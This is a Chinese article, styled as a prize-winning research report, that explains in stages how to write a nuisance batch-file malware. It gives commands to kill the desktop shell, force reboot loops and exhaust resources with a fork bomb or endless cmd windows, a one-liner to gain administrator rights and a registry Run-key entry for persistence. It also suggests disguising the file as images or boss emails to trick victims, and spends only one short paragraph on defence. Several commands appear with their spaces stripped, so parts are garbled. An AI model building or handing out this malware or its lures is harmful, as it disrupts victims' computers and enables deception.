恶意批处理文件导致电脑黑屏、反复重启、无响应的原因分析及应对思路获奖科研报告

恶意批处理文件导致电脑黑屏、反复重启、无响应的原因分析及应对思路获奖科研报告电脑"黑屏"、“反复重启”、”死机无响应”，成因多种多样，处理方法也各不相同。很多时候，是恶意计算机程序导致，这里做个分析，提供一种解决思路。

一、有三条计算机命令，常被初级黑客用来制造小麻烦

1、電脑屏幕变全黑

taskkill-f-imexplorer.exe

作用，关闭windows的图形桌面。

2、在指定时间后，重新启动电脑

shutdown-r-f-t10

作用，在10秒钟后，重新启动windows电脑，强制执行。把这个命令放入“开机启动”中，可以实现开机后，反复重启计算机的效果。推而广之，也可以预定在某个约时间，执行一系列的命令，不仅仅是重启电脑，也可以备份重要数据到远程等等。

3、把计算机资源耗尽，导致死机无响应

建立一个批处理文件中，输入命令为

%0|%0

作用：批处理文件反复调用自己，每调用一次，占用一定资源，直到把计算机资源耗尽。

此外，常见的方法还有：建立一个批处理文件中，输入命令为

：callCmdWindow

startcmd.exe

gotocallCmdWindow

其作用是利用批处理文件，不断弹出CMD命令窗口，直到将计算机资源耗尽。与%0|%0的思路相通，方法不同而已。

二、命令代码如何被计算机自动执行

1、利用windows自启动项

windows注册表Run键，是最易容想到的程序自启动位置，让电脑进入widonws后，自动加载恶意代码，只要把包含恶意代码的文件，加入到Run即可。Run键有2个位置，分别是：

[HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

[HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run]

2、把批处理文件放到自启动项里

写一个批处理文件。这个批处理文件的功能，不仅包括要执行的“捣乱代码”，还要包括，取得必要的程序执行权限，修改注册表，以及把自己加载到计算机的开机自动执行程序名单里面等功能。

（1）新建一个批处理文件，

用windows自带的记事本，新建一个批处理文件，例如，文件名是：我的批处理文件.cmd，windows中批处理文件后缀是.bat或.cmd，后缀与具体windows版本有关。

（2）获取windows系统管理员权限

想要修改注册表，比如RUN值等，都需要先拿到计算机的系统管理员权限，才能实施。在批处理文件中加入下列命令，取得管理员权限。

%1mshtavbscript：CreateObject（"Shell.Application"）.ShellExecute（"cmd.exe"，"/c%～s0："，""，"runas"，1）（window.close）&&exit

（3）批处理文件将自身加入到windows自启动项

在取得管理员权限后，在批处理文件中，写入下列代码，完成在注册表中，把批处理文件自身加入到开机启动的清单里面。这样，以后，每次电脑开机，都后执行这个批处理文件，也就是这个文件中的恶意代码。

regadd"HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼run"/v我的批处理文件/d"%～dp0我的批处理文件.cmd"/f

（4）恶意代码

选本文第一部分介绍的3个方法之一，放与（略）

三、如何让电脑用户点击这个批处理文件

完成上面的工作，一个简单的黑客程序就写好了。如何让别人来执行这个黑客程序呢。这就要用到社会工程学了，说白了，就是如何去忽悠人，想办法让人点击这个批处理文件，一点击，就可以在受害人的电脑上执行了。常见的就是，把这个文件伪装成吸睛美图、扫二维码中奖、老板邮件的附件等等。

四、如何防范

此种恶意代码很易容在内网中制造麻烦，因为这种恶意程序是自己编制的，用的也是正常的命令，没有进入计算机防病毒软件的病毒库，反毒软件也很发现和防范这种代码。因此，了解一些计算机安全基本常识必要，不点击来源不明的文件和链接，了解并查看自己计算机的启动项内容，会清理不必要的启动项，可以有效防范类似恶意代码。

五、结束